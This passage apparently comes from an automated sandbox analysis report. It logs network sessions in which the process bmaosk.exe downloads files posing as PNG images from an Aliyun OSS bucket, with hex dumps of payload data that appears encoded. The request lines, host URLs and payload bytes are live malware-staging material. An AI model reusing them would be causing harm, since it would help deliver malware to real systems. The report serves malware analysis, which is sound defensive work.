                                                                                2025-01-10 01:28:09 UTC4096INData Raw: 60 60 eb 25 68 30 9f 75 d0 14 62 70 e9 25 84 e3 1d 84 60 15 67 52 a0 89 a9 60 60 60 06 67 e5 4c a2 a0 c6 2b ed ac f1 5f b5 0c d4 a2 b0 c6 29 e5 4e 2b f5 44 2b e2 ac 2b a8 2b b1 29 f5 10 8a f0 6d a5 0c b0 6b ad 34 6b b1 a8 b2 1f f5 2c 94 e2 f0 63 18 1f 95 e7 d2 20 09 68 e0 e0 e0 67 e5 5c a1 a0 a0 a0 ca a4 2d e5 5c f0 ca a8 c8 5f 5f a0 a0 2b ed 74 2b f1 e8 f2 5f b5 08 d4 a2 70 e5 a0 15 59 a7 25 b8 61 60 60 60 a7 25 bc 40 df 62 60 a7 25 80 e8 73 60 60 0a 60 0a 60 ed 25 48 f0 ca a0 ca a0 ca ac 2d ed 78 f1 c8 a4 a0 a0 38 2b f5 74 2b e2 e8 f0 5f b5 00 d4 a2 b0 2b ed 34 26 a1 b3 e1 8a e0 8a e0 8a e0 6b b5 34 b2 88 69 f7 e0 f0 8a e0 8a e0 08 da 10 e0 e0 63 24 fc 2b ed 74 29 e1 e4 10 a1 2b 45 fd 62 a8 a0 f5 2b 4c 18 b8 6a a0 a0 48 9a a7 a1 a0 f6 f7 2b e5 a8 e9 e5
                                                                                Data Ascii: ``%h0ubp%`gR```gL+_)N+D+++)mk4k,c hg\-\__+t+_pY%a```%@b`%s````%H-x8+t+_+4&k4ic$+t)+Eb+LjH+
                                                                                2025-01-10 01:28:09 UTC4096INData Raw: 9d 9f 9f 31 ed f5 f4 9e 9f 9f 32 88 1d 9d 60 60 e3 a4 70 ed e5 f4 9e 9f 9f 30 ed ed 10 5d 5f 5f f1 5f b5 30 d2 a2 b0 ca a0 c8 20 a0 a0 a0 ca a2 ca a0 ca a2 c8 a0 a0 a0 e0 c8 a0 4c a2 f0 1f f5 74 92 e2 f0 69 65 84 1d 1f 1f 63 5d 84 1d 1f 1f 1f 95 e7 d3 20 09 0a e0 e0 e0 8a e0 6d 35 cc 5d 5f 5f f2 2b e5 a8 f0 48 06 5c a0 a0 23 64 a4 2b ed ac 8b 68 23 49 a1 f1 2b f5 a8 f2 48 f1 9c 60 60 e3 a4 64 eb 2d 68 ed 34 61 61 32 eb e5 04 9d 9f 9f 30 9f 75 f8 12 62 70 eb ed 04 9d 5f 5f f1 5f b5 44 d2 a2 b0 c8 54 a1 a0 a0 5f b5 6c d2 a2 b0 ca a1 c8 8c 4c a2 b0 48 61 5c 5f 5f 63 24 e8 8a e0 88 b8 0c e2 f0 08 dd 1b e0 e0 63 24 e8 63 18 1f 94 d0 8a e0 8a e0 8a e0 6d 75 18 5e 5f 5f f2 c8 24 4c a2 b0 ca a0 5f b5 a0 d3 a2 b0 ca a0 01 68 ec a5 b0 f0 5f b5 3c d2 a2 b0 ca 60 9f
                                                                                Data Ascii: 12``p0]___0 Ltiec] m5]__+H\#d+h#I+H``d-h4aa20ubp___DT_lLHa\__c$c$cmu^__$L_h_<`
                                                                                2025-01-10 01:28:09 UTC4096INData Raw: 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 44 45 46 47 48 49 4e 4e 4e 4a 4b 4e 8e 8e 8c 8d f5 2b 4c 21 4c 18 a2 a0 a0 29 2d e8 5d 5f 5f c8 ac 4e a2 b0 48 3e a3 a0 a0 23 64 a4 8a e0 88 f4 0e e2 f0 08 d5 0d 1f 1f 63 24 e8 8a e0 88 d0 0e e2 f0 08 c6 0d 1f 1f 63 24 e8 88 08 a3 a0 a0 5f b5 6c d2 a2 b0 c8 e8 4e a2 b0 5f b5 20 d2 a2 b0 c8 c0 4e a2 b0 5f b5 20 d2 a2 b0 c8 88 63 60 60 9f 75 ac 12 62 70 08 64 61 60 60 ed e5 98 9e 9f 9f 30 0a 60 9f 75 e4 12 62 70 a6 e5 24 5e 5f 5f eb 66 25 25 5e 5f 5f e5 66 25 26 5e 5f 5f f2 66 25 27 5e 5f 5f ee 66 25 28 5e 5f 5f a5 26 65 69 1e 1f 1f ac 26 65 6a 1e 1f 1f d3 26 65 6b 1e 1f 1f d2 26 65 6c 1e 1f 1f ce 26 65 6d 5e 5f 5f c4 66 25 2e 5e 5f 5f cc 66 25 2f 5e 5f 5f cc 66 25 30 5e 5f 5f a0 66 25 d4 5e 5f 5f e7 a6 e5
                                                                                Data Ascii: NNNNNNNNNNNNNNNNNDEFGHINNNJKN+L!L)-]__NH>#dc$c$_lN_ N_ c``ubpda``0`ubp$^__f%%^__f%&^__f%'^__f%(^__&ei&ej&ek&el&em^__f%.^__f%/^__f%0^__f%^__
                                                                                2025-01-10 01:28:09 UTC4096INData Raw: 90 12 62 70 d8 61 60 60 60 8b 62 8b 80 eb 85 3d a3 35 eb 8c e3 8c 08 37 eb 25 68 e9 25 38 66 e5 3c a0 19 b8 a0 a0 a0 93 60 2d dd 3d 53 0b c6 0b 0a ca c4 2b ed 38 f1 2d f5 3c f2 48 92 2f e0 e0 63 24 ec 6d a5 7c b0 6b ed 28 09 e2 f0 b1 88 78 a5 e5 f0 6b b5 78 63 22 84 b2 08 df 1f 5f 5f 23 64 b0 93 60 ff 2b 45 fd 62 a4 a0 f5 2b 4c ca a0 01 68 49 a2 b0 f0 c8 38 e5 a5 b0 2b ed 68 31 88 7a 9f 9f 9f e3 a4 70 53 a0 3d a2 64 60 35 eb 8c 0a 60 c1 60 60 60 70 30 08 60 60 60 70 2b ed a8 f1 48 58 5e 5f 5f 23 64 b0 93 60 fd 62 a4 a0 f5 2b 4c 21 4c 80 a4 a0 a0 f7 c8 cc 4f a2 f0 1f f5 68 92 e2 f0 69 a5 18 d3 20 86 41 6a dd e5 f0 65 20 95 e5 09 a7 e1 e0 e0 d3 29 86 6b ed 2a 9d a5 b0 29 ed 5c 2b f5 5c 61 42 aa 29 f5 50 ca a0 c8 20 a0 a0 a0 ca a4 ca a0 ca a2 c8 a0 a0 60 20
                                                                                Data Ascii: bpa```b=57%h%8f<`-=S+8-<H/c$m|k(xkxc"__#d`+Eb+LhI8+h1zpS=d`5````p0```p+HX^__#d`b+L!LOhi Aje )k*)\+\aB)P `
                                                                                2025-01-10 01:28:09 UTC4096INData Raw: 60 60 eb 25 68 30 ed ed 40 9d 9f 9f 31 88 00 df 60 60 e3 a4 6c a6 e5 f8 9e 9f 9f 60 d9 f9 a0 a0 a0 93 60 2d 1d 39 5e 5f 5f 53 0b c6 0b 0a ca a0 ca a0 ca a2 ca a0 ca a1 c8 a0 a0 a0 e0 6d 75 cc 1e 1f 1f b2 1f f5 74 92 e2 f0 69 65 70 1e 1f 1f 63 5d 70 1e 1f 1f 1f 95 e7 d3 20 09 11 a0 a0 a0 ca a0 2d 25 34 5e 5f 5f f0 2b ed ac 21 49 d0 a1 a0 a0 f1 2b f5 a8 21 62 d0 a1 a0 a0 f2 eb e5 f0 9e 9f 9f 30 9f 75 f8 12 62 70 e5 a0 15 67 53 a0 89 dc 60 60 60 eb ed f0 9e 9f 9f 31 9f b5 a4 ed a5 b0 2d 35 88 5d 5f 5f f2 48 c4 6c a0 a0 23 64 a4 25 60 d4 85 2d 25 88 5d 5f 5f f0 2d 6d cc 1e 1f 1f b1 88 6c 11 e2 f0 6d 75 78 1e 1f 1f b2 1f f5 b4 ad e5 f0 63 24 f0 0b f4 6d 65 cc 5e 5f 5f f0 2d 2d 38 5e 5f 5f f1 5f b5 68 d2 a2 b0 2b 35 84 5d 5f 5f 29 35 bc 5d 5f 5f 23 1d bc 9d 9f
                                                                                Data Ascii: ``%h0@1``l``-9^__Smutiepc]p -%4^__+!I+!b0ubpgS```1-5]__Hl#d%`-%]__-mlmuxc$me^__--8^___h+5]__)5]__#
                                                                                2025-01-10 01:28:09 UTC4096INData Raw: ac ac 35 eb 8c 53 a0 c0 4c c6 65 70 e3 80 61 e5 a0 15 6f ea 6d 4c c6 65 70 e0 a9 61 e8 ad 8c 06 a5 b0 fd 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 ac 2a e8 6b b5 1c 68 ea 8a e0 6b ad 1c 08 f5 e2 e0 e0 6b a5 e8 b0 6b ad 1c 08 a9 e1 e0 e0 6b a5 1c 6b 45 fd 62 a8 a0 f5 2b 4c f1 29 ed 5c ca a1 2b ed 5c 48 4f a1 a0 a0 2b 45 fd 63 6c 6c 6c 6c 6c 6c ac ac ac ac ac 35 eb 8c 31 e9 2d 9c ea 25 68 30 0a 61 eb 2d 9c 88 eb 60 60 60 eb 85 3d a2 64 60 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 5c 2b e8 a8 9b ed a8 d7 a5 48 c2 c9 a1 a0 2b ed 5c 48 f1 e1 e0 e0 6b b5 1c 6b a2 e4 e3 a5 e8 6b 05 bd 22 e4 e0 2c 2c b5 6b 0c 63 0c e8 69 ad 1c 6b a5 5c 23 d8 a4 a0 d5 aa 48 c9 a1 a0 a0 29 e5 58 4b a9 2b ed 5c 2b f1 a4 29 f5 58 2b e5 58 2b 45 fd a3 ac
                                                                                Data Ascii: 5SLepaomLepacllllllllllllll+L)\+*khkkkkkEb+L)\+\HO+Ecllllll51-%h0a-```=d`lllll+L)\+\+H+\Hkkk",,kcik\#H)XK+\+)X+X+E
                                                                                2025-01-10 01:28:09 UTC4096INData Raw: e3 98 1d 15 6a a7 65 0c 94 62 70 60 60 60 60 e3 5d 0c 94 62 70 60 14 41 08 12 74 60 60 5f b5 6c d2 a2 b0 2b 2d 44 5e 5f 5f 48 7c 5c 5f 5f 2b 2d 44 5e 5f 5f 48 ff 5d 5f 5f 2b ed 54 c4 69 ed e0 e0 e0 e0 bf be bb 6b 05 bd 22 e8 e0 2c 2c 2c 2c 2c 2c b5 6b 0c b1 69 ad 1c 6b ad 1c 08 23 5c 5f 5f 2b e5 a8 23 40 a1 25 60 d4 ac 2b ed 5c f1 48 53 3e a0 a0 23 64 a4 2b e5 5c 2b 45 fd a2 64 60 ac ac 35 eb 8c 88 67 60 60 60 88 71 60 60 60 3d a3 35 eb 8c d9 ad 2c 65 70 88 75 3c 61 a0 fd 63 f5 2b 4c c8 f0 d7 a0 b0 48 10 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6d ec a5 b0 48 d3 fd e1 e0 bd 23 b5 6b 0c 08 e7 e0 e0 e0 08 f1 e0 e0 e0 bd 23 b5 6b 0c 59 2c ac e5 f0 08 30 89 e1 e0 fd 63 f5 2b 4c c8 2f d7 a0 b0 48 d1 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6c ec a5 b0 48 90 cb a1 60 3d
                                                                                Data Ascii: jebp````]bp`At``_l+-D^__H|\__+-D^__H]__+Tik",,,,,,kik#\__+#@%`+\HS>#d+\+Ed`5g```q```=5,epu<ac+LH#dc+LmH#k#kY,0c+L/H#dc+LlH`=
                                                                                2025-01-10 01:28:09 UTC4096INData Raw: 25 d0 30 9f 75 4c 10 62 70 eb 2d f8 e9 2d e4 eb 35 d0 32 9f 75 84 12 62 70 eb 25 cc 30 5f b5 44 d2 a2 b0 2b ed 24 29 ed 18 4b a7 67 e5 18 a0 a0 a0 a0 23 dd 14 a0 d4 aa 2b f5 14 f2 5f f5 ec 92 e2 f0 6b a5 58 6b 05 bd 23 b5 6b 0c 61 0c 7c e5 e0 e0 88 df 68 e0 f0 88 50 3d e4 f0 1f b5 80 d0 a2 b0 03 54 ed a5 b0 67 a5 58 ed a5 b0 80 a0 a0 a0 67 a5 a0 ee a5 b0 a7 a0 a0 a0 67 a5 64 2e 65 70 60 60 60 60 a7 65 70 2e 65 70 b0 67 60 60 a7 65 6c 2e 65 70 61 60 60 60 a7 65 9c 2d a5 b0 a2 a0 a0 a0 c8 58 ed a5 b0 01 54 ed a5 b0 f0 5f b5 c4 d0 a2 b0 67 a5 ac ee a5 b0 a0 a0 a0 e0 88 14 e1 e0 e0 1f f5 2c 92 e2 f0 27 65 8c 1f 1f 1f 74 e0 e0 e0 6d 6d 8c 1f 1f 1f b1 1f f5 f8 d2 a2 b0 23 1d d0 5f 5f 5f a6 d3 96 67 a5 5c ed a5 b0 a4 a0 a0 a0 c8 58 ed a5 b0 2b b5 54 ed a5 70 32
                                                                                Data Ascii: %0uLbp--52ubp%0_D+$)Kg#+_kXk#ka|hP=TgXggd.ep````ep.epg``el.epa```e-XT_g,'etmm#___g\X+Tp2


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                19192.168.2.560499118.178.60.1034431220C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:29:30 UTC131OUTGET /extra-task2.png HTTP/1.1
                                                                                User-Agent: Chrome/114.0.0.0
                                                                                Host: upitem.oss-cn-hangzhou.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:29:31 UTC548INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:29:31 GMT
                                                                                Content-Type: image/png
                                                                                Content-Length: 1589824
                                                                                Connection: close
                                                                                x-oss-request-id: 678077FB2C1E933430EB96F5
                                                                                Accept-Ranges: bytes
                                                                                ETag: "BA024D16008C2932005DB859C94476A8"
                                                                                Last-Modified: Tue, 07 May 2024 13:52:08 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 16714771568971376594
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000105
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: ugJNFgCMKTIAXbhZyUR2qA==
                                                                                x-oss-server-time: 13
                                                                                2025-01-10 01:29:31 UTC3548INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 54 00 00 02 c0 08 06 00 00 00 76 4e 6b 38 00 00 20 00 49 44 41 54 78 9c 9c fd 0b 96 ec ba 0a 2d 0a 8a bc bd a8 46 57 7b aa 2d af 2f 37 e5 a2 42 4a a8 8d 40 ac 73 c6 f9 29 ae 1a 96 f0 c7 c3 4b 00 ce 4e 63 cc f6 6a d8 91 e4 21 90 5c d8 a0 3a 98 21 dc 45 1c 05 ce 4e 7f 01 81 b6 26 e5 3e 00 b5 4d 6e 2a 70 93 f3 af ee b8 74 a1 c9 a0 9e 58 52 06 4c 39 83 94 75 65 f9 b9 74 78 66 41 24 b6 8c fe 7b 34 ca d8 46 76 c3 6a 19 be ba ba d0 ab a1 02 9c 6e cb 3b a5 1f 22 5f be 2c 1f 46 79 be 1d 31 c0 b4 f9 aa b2 c6 86 a2 a8 cf cb f6 4a 6a a2 97 e3 87 21 7c e8 ab cb 4a d3 46 e5 e3 52 39 b5 4c e4 51 79 d8 cc 4b 4b 02 5a dc e8 97 e6 78 79 1b b1 6d 06 2a 64 0e 29 26 25 07 aa c2 19 71 e2 ce 9a 2e 47 cf f2 59 52 8d 23 67
                                                                                Data Ascii: PNGIHDRTvNk8 IDATx-FW{-/7BJ@s)KNcj!\:!EN&>Mn*ptXRL9uetxfA${4Fvjn;"_,Fy1Jj!|JFR9LQyKKZxym*d)&%q.GYR#g
                                                                                2025-01-10 01:29:31 UTC4096INData Raw: 1e db cb 1c cf 5e bb 1e 7a 6e 22 89 71 ae 06 d9 4d 98 64 43 b4 85 be 17 a6 bc 9c cc e2 c7 15 d9 c9 ee c3 3e 92 54 95 eb 78 72 d3 48 71 37 52 e1 74 5b d9 1c 09 12 10 7a 36 c8 48 14 83 a8 51 f3 1f 87 cb 7d 6b 88 74 27 21 cc 63 79 dd 74 4d 73 81 c6 ab 0b 93 8c 52 4a 2b 59 76 53 5a 1f 17 f1 df 6c 72 29 e7 a8 0c e6 fa e3 28 60 31 35 ca 87 d8 92 38 2c 53 03 89 02 a8 e4 83 e0 db de 6d 22 a1 f7 c7 25 45 f0 37 b9 83 60 45 e5 2e 22 f1 c9 c2 06 a4 e0 18 3d ab 53 3e 08 a8 24 fd e5 64 0e ae 92 cb a3 ff c0 d4 09 ab 33 3a 61 f9 61 47 a9 c7 61 5c cd a1 44 c7 62 b0 70 ce 08 65 85 05 4d 9b 21 00 80 27 66 49 40 82 be 7a 3d b7 b6 41 b1 b5 ad bf e7 55 17 b3 75 5f e0 d3 c0 33 1d cb da 42 8d 79 b4 e2 74 2e f2 91 17 b4 26 a2 b7 fc 5c 6d fb d4 a3 b6 5a de 79 b3 79 e8 8a 84 ec 17
                                                                                Data Ascii: ^zn"qMdC>TxrHq7Rt[z6HQ}kt'!cytMsRJ+YvSZlr)(`158,Sm"%E7`E."=S>$d3:aaGa\DbpeM!'fI@z=AUu_3Byt.&\mZyy
                                                                                2025-01-10 01:29:31 UTC4096INData Raw: 02 b9 e7 8d 6e cf 34 1c e8 dd 41 b7 99 31 f3 e0 f1 96 4a 47 d5 1d 35 8b 12 f1 29 84 f0 0e 35 0a 68 f7 c3 b3 10 67 6d 69 06 a5 cd 0d 90 ae 9b 07 3d 99 f6 9a cf 91 1e f4 22 0e 9d 7f f4 21 37 ca c6 41 a0 4d 9c d1 f3 6b 5b e9 32 43 f4 19 4c 6d d5 2a e8 26 20 63 b1 e4 fb 03 bb 6f 48 a1 ba 9f c3 72 b3 69 38 ca 42 cb c4 6b 25 5f 9c 84 63 6c ba a4 2c ff 7b 05 43 93 83 cd a7 c0 ce db 24 1d c7 60 f4 b0 9c e4 eb 02 17 ed 4c e6 97 7c 5b 4a 2c 2e 2b 5c 23 5a 4f 25 23 fc 75 ad e5 a6 b8 f8 ba 4b f8 37 bf dd 2a 18 77 04 fb bf 41 39 82 fb 51 ff 5a e8 17 85 1c 10 1b d2 0e ef 3a a5 82 04 3a 18 96 a3 7a 7c 1e ad 77 13 f1 74 29 77 74 3e 15 80 6a ed 87 d8 ef 8f b7 55 8d c6 82 26 de 80 85 02 c7 9f 11 b5 46 79 00 2b 91 5d c4 d4 07 d0 d7 95 15 2a 80 56 03 06 33 10 78 f0 ac 20 96
                                                                                Data Ascii: n4A1JG5)5hgmi="!7AMk[2CLm*& coHri8Bk%_cl,{C$`L|[J,.+\#ZO%#uK7*wA9QZ::z|wt)wt>jU&Fy+]*V3x
                                                                                2025-01-10 01:29:31 UTC4096INData Raw: 4f a3 03 28 bf 93 69 73 76 0c 11 92 ce b8 6d 44 06 8d aa 02 96 a4 d9 cf 49 89 07 91 81 61 1b 57 f3 14 8c 77 16 74 d1 ac d2 e9 d7 d5 e7 d6 45 79 ed 19 e3 10 ea 58 ac 7d fc 00 03 85 f8 b5 1e 73 26 3f ab 95 6d 6f b0 e1 ba 7a 1c 76 6e 12 90 00 12 e2 3a 2c 6a c3 1c 08 b4 f9 09 8c e0 8f 1e 3a 64 f1 b3 82 2f d4 fa 2f 84 99 fb 4d 72 94 d4 5c 6f b1 66 bc c6 bd 15 39 6f a9 7d 49 d3 ad 25 e1 e7 86 03 e5 e6 12 3c 06 28 22 49 3a 5f a4 f4 c8 bd ac df fb 52 8b 69 cd 8a 89 8e 0f 9f ec 57 c7 55 a6 64 fd be ea 3c b4 cd 56 1e be 3d 5d ef b2 09 95 68 c2 84 cf 5f 2f cd 4d 44 01 c7 dc 9d e7 6c c1 f5 53 6a d4 71 0f 55 39 46 a4 4e 72 61 a2 31 65 a7 6e e6 28 71 aa 55 b4 93 bc fb 9f c5 61 7f e9 36 5f df c2 38 8f 73 4f bf 90 06 ca 80 9e 5d 54 21 7e 3f b9 8d e0 ff ad c9 94 ae a8 3d
                                                                                Data Ascii: O(isvmDIaWwtEyX}s&?mozvn:,j:d//Mr\of9o}I%<("I:_RiWUd<V=]h_/MDlSjqU9FNra1en(qUa6_8sO]T!~?=
                                                                                2025-01-10 01:29:31 UTC4096INData Raw: 83 9f 3b 09 c9 99 25 77 03 b7 f1 0b 1b b0 99 e1 da 02 7d 96 0d c8 ca a5 50 91 51 78 76 c4 ed 7a fc d5 1a 2a 9f 59 8e 63 49 f7 4d 9c e5 1b d8 b9 a7 d0 5f 55 f5 77 4d da f1 d8 79 fd 0a 3d 15 ca 49 04 07 d7 14 cc 91 b1 e7 67 e2 58 8e 2e c8 ff 7d 12 12 ad 25 9d cc e3 18 1c 13 c9 bc 9d 7b 04 4d b9 66 46 04 74 87 95 3d 95 5c e2 3f e9 92 6d cb 93 c0 cf e6 c0 ec 10 9a 35 70 4f f8 55 c8 14 77 7b d8 50 6d fc 41 21 13 f8 a6 56 ac 55 0b 5b 53 c7 61 ec d9 e2 31 c5 cd ae a2 4d d4 b1 ec 6b 30 e2 80 45 a5 5b 76 92 df e5 ed 30 15 0f ea c9 d1 a2 d4 fc 6f a5 bd 66 54 1f a9 f5 74 a0 72 37 19 9e b9 c8 10 de e0 27 e0 d6 1b 6f 3b ab 9f 56 36 44 4d ee e6 2b 52 19 b6 1b 82 60 06 6a 47 eb 43 be c3 0a b7 1f 11 79 2e 15 79 1f 21 9f 07 c0 09 6f d6 d9 e2 87 e0 ce 62 c9 bf bb 6f b6 25
                                                                                Data Ascii: ;%w}PQxvz*YcIM_UwMy=IgX.}%{MfFt=\?m5pOUw{PmA!VU[Sa1Mk0E[v0ofTtr7'o;V6DM+R`jGCy.y!obo%
                                                                                2025-01-10 01:29:31 UTC4096INData Raw: 57 e8 93 95 cc 20 d7 78 af 8b bc 5f b3 cc 64 3b c5 ed 5a 1a 0d 8f 8a 47 1f 95 13 65 37 0f 7a d2 3d b0 1c 85 4f 13 ae 58 28 87 83 d1 27 b3 60 c8 1c 94 4d 05 00 f4 b0 91 55 7a 6a 77 5a 98 ea de 70 ce 7a f4 e7 58 36 5a 0c 4b 85 a6 65 a4 e5 02 81 18 76 b7 44 4e 2d cb 7f 1a 39 42 57 db 60 50 8d 3d 06 d3 70 ea 1f 81 06 a3 49 c2 81 d7 f6 da 59 df ad 3a b8 c0 ae 36 fb 2b a7 65 7b df fa 4f eb 13 37 72 09 de 5e 48 d3 aa d4 21 a5 aa 49 09 90 0f c5 a4 4a ae 32 38 4f 8d 9f 08 0e a0 a3 45 c3 33 9f b9 15 38 2f fc 91 b9 90 fb ac d1 2d 4c e0 1e be d3 b1 54 27 2c 4f 1d 81 df 6d 8b 7b ab 47 3e 42 be 29 ef b4 72 85 5d 78 d0 2f 08 9a d0 07 b7 92 bf f7 db 5b 49 5d fc 9d 76 38 6f 4f dd 7d 0f 2e 05 f5 de 2d da c9 5d 03 aa d2 ed 13 64 68 87 78 4b 33 c9 4e 13 27 d9 26 15 ca f8 29
                                                                                Data Ascii: W x_d;ZGe7z=OX('`MUzjwZpzX6ZKevDN-9BW`P=pIY:6+e{O7r^H!IJ28OE38/-LT',Om{G>B)r]x/[I]v8oO}.-]dhxK3N'&)
                                                                                2025-01-10 01:29:31 UTC4096INData Raw: c9 9c 50 a9 06 eb d5 7e 85 ac 29 f4 fc 25 bb b2 0f 71 e5 bc cd af 05 b5 07 27 1e 5d 28 3d 11 df e5 93 3b 0b 2a 57 45 7f 4a 5f 12 7f bd 32 0c 19 94 66 40 26 fe ec f4 06 a0 a0 42 1e d3 09 f2 c5 d0 b5 b7 f6 7e 4e fb 34 01 81 79 e7 63 89 5b 3b 98 d3 4c a6 4f 28 11 7a a8 5e 34 e4 59 b7 2e e6 86 4a 3a 8c d4 b0 a8 f8 cd 91 b6 3e a3 30 b4 e2 16 26 e3 11 05 42 0c cf 1a a8 12 de 88 6f 67 1c 28 07 c3 03 bf 1d 53 51 70 12 a7 e9 c0 ab d5 e6 72 6c 27 4c 8a e6 b5 13 74 3d 14 21 1d b3 43 6a fe d1 bd 23 2d dc 77 33 80 53 c6 09 d3 7a 89 ca d2 e1 41 d6 0b c9 ec d4 c9 1d b9 a3 ff 38 5c 2d 21 1c 2e 48 bd ed f9 ae 7e a7 b2 6d e9 bd 11 d1 59 b5 a3 f0 6e 18 95 b4 60 16 75 88 0d c0 7f 54 38 fa 2e 78 58 40 37 81 7c 7a f5 c9 23 60 6a 57 48 22 06 91 63 64 53 e8 8c 45 02 7d c7 bd 16
                                                                                Data Ascii: P~)%q'](=;*WEJ_2f@&B~N4yc[;LO(z^4Y.J:>0&Bog(SQprl'Lt=!Cj#-w3SzA8\-!.H~mYn`uT8.xX@7|z#`jWH"cdSE}
                                                                                2025-01-10 01:29:31 UTC4096INData Raw: a4 ce 1b 3f b1 95 f5 e2 f7 1d ca 9b a6 e3 de 50 05 be 4b 09 79 80 9f bf 28 8b a3 2d cb 60 1a cb 5a 62 c5 a8 6f 61 23 c0 ba 5a b4 ce 73 ac c3 10 36 06 7e cf 55 91 84 23 ca a4 7f 64 ad eb f9 42 d4 65 45 38 1d ea 85 58 ee 90 f7 c5 ad 82 1e aa ab ec 28 11 9d 08 75 8e 99 23 51 56 12 bb f2 ec a5 8c 71 52 30 12 8f b2 22 03 54 49 17 2d a9 e2 9b c9 d8 91 3d e6 4b e2 54 8d 20 7a 98 65 6a a6 80 f3 2a 47 63 e8 9e d3 10 a3 c1 d5 de 99 04 32 c0 6c 88 f1 2b 35 a2 46 f4 ea 5b 0c 34 6e c2 95 e5 52 f6 ef bc 63 f5 ff c0 ba b5 a1 61 b0 37 98 b5 8b 50 f2 b3 ff 86 a3 86 34 9d e1 d7 31 2c 2e d4 ae ca 03 9b 17 e1 5b 38 fa 2b a7 ee 18 ec bc f2 fd 26 d2 71 4e fc 6c a2 3d 51 f7 42 b0 e6 5d a8 9f 6b 56 d0 45 02 38 11 fc 1e e1 87 50 68 ee 1f 1e 4d f4 4c 09 27 ce 66 df b2 36 7a 52 e3
                                                                                Data Ascii: ?PKy(-`Zboa#Zs6~U#dBeE8X(u#QVqR0"TI-=KT zej*Gc2l+5F[4nRca7P41,.[8+&qNl=QB]kVE8PhML'f6zR
                                                                                2025-01-10 01:29:31 UTC4096INData Raw: 32 53 be f8 e1 2c e4 5a 11 81 f9 a6 d2 6c 61 df 95 a9 4b d9 2a 41 e6 db af 73 74 3b 57 6e 91 aa 58 48 2a 5b a7 c8 63 b7 00 5e a2 91 55 1a 3a 46 37 72 6b d2 88 c6 37 94 fe 9b 5e 56 8d f8 1e f8 77 1d b7 40 c1 be 7d 16 90 29 04 a9 bf ac 47 7f 75 1a 2a eb 90 a6 76 52 c9 79 a2 0c 24 a4 27 c4 8c a5 92 9d e1 b0 8d e9 4d 28 fe ef 9c 9a ae dc 09 4b 88 04 d5 64 46 5b 35 70 76 67 fa 4f b6 77 10 3e 6d 5c 26 99 f0 5e 70 41 47 4f 86 43 3c c2 e1 ff 6c 88 c0 0b c6 69 df 26 48 b4 ee 01 20 17 95 2d 58 53 25 ed 89 0f 86 5d c0 bd 8c b2 ea 67 ff 6e 0d 46 21 65 29 7c cc 51 2c f1 fc c6 5f 33 e1 c3 4c c3 56 b3 e0 db a9 96 fc aa b5 79 04 4b 76 8b 58 b6 c5 2d 21 24 53 ab b4 57 82 d7 1f 5b 9c 5e f4 72 cc 55 3a 7d b4 71 25 8d 23 80 46 c0 98 25 44 d1 1d df bc 03 70 90 76 34 3f fe c6
                                                                                Data Ascii: 2S,ZlaK*Ast;WnXH*[c^U:F7rk7^Vw@})Gu*vRy$'M(KdF[5pvgOw>m\&^pAGOC<li&H -XS%]gnF!e)|Q,_3LVyKvX-!$SW[^rU:}q%#F%Dpv4?
                                                                                2025-01-10 01:29:31 UTC4096INData Raw: b0 46 4a 18 a4 5b df a0 4c 0b a6 0f 91 d2 5e 2a 3f 0e 08 a1 76 13 8d bc eb 81 1b 98 ac 98 fd a6 92 2d 18 63 44 41 2b 6f 93 4a 90 b5 bd 55 f9 9e c0 fd 0b 40 c4 20 4e c8 a3 7d 18 f8 03 b9 16 a2 7d f0 5b dc 69 1f 83 bd a0 a8 db c6 6b ad 9f fe 4b 55 02 16 dc 81 1b 3a 30 2d 16 27 93 38 3a 3f ca 2d 56 13 69 ff 3e 2c 74 e7 e2 e7 b9 9a 3c 24 2c f7 68 99 b1 ff 55 a4 31 a9 92 b9 7b ff 07 73 b6 80 63 50 79 5d a3 82 b8 d9 83 b7 bb 5f 8f 88 0b 5f 11 61 a7 45 20 e5 f8 37 ed c3 fd 2e 12 cb c5 f6 bb 01 a7 ce 60 88 e4 54 b4 14 eb dd f0 5e 0e 71 96 29 ce 6e cf fb 11 49 0d 5f 56 be a6 37 e1 4e b0 be 1c 3b ef 00 3b f5 fd 09 69 ce 43 dc 42 84 d7 a6 5d 9a cb 0a 96 74 e4 b2 10 81 67 b8 03 84 89 ff 87 ea 89 5c b6 37 b6 f9 3d 49 d1 e0 12 59 10 77 ca 12 73 9f c0 20 54 3d 92 47 b3
                                                                                Data Ascii: FJ[L^*?v-cDA+oJU@ N}}[ikKU:0-'8:?-Vi>,t<$,hU1{scPy]__aE 7.`T^q)nI_V7N;;iCB]tg\7=IYws T=G


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.2.560500118.178.60.1034431220C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:29:35 UTC127OUTGET /dsb-hr2.png HTTP/1.1
                                                                                User-Agent: Chrome/114.0.0.0
                                                                                Host: upitem.oss-cn-hangzhou.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:29:35 UTC544INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:29:35 GMT
                                                                                Content-Type: image/png
                                                                                Content-Length: 57536
                                                                                Connection: close
                                                                                x-oss-request-id: 678077FF09E59834351FE0CA
                                                                                Accept-Ranges: bytes
                                                                                ETag: "9E285C23C9DA187B313051DD6FEB4266"
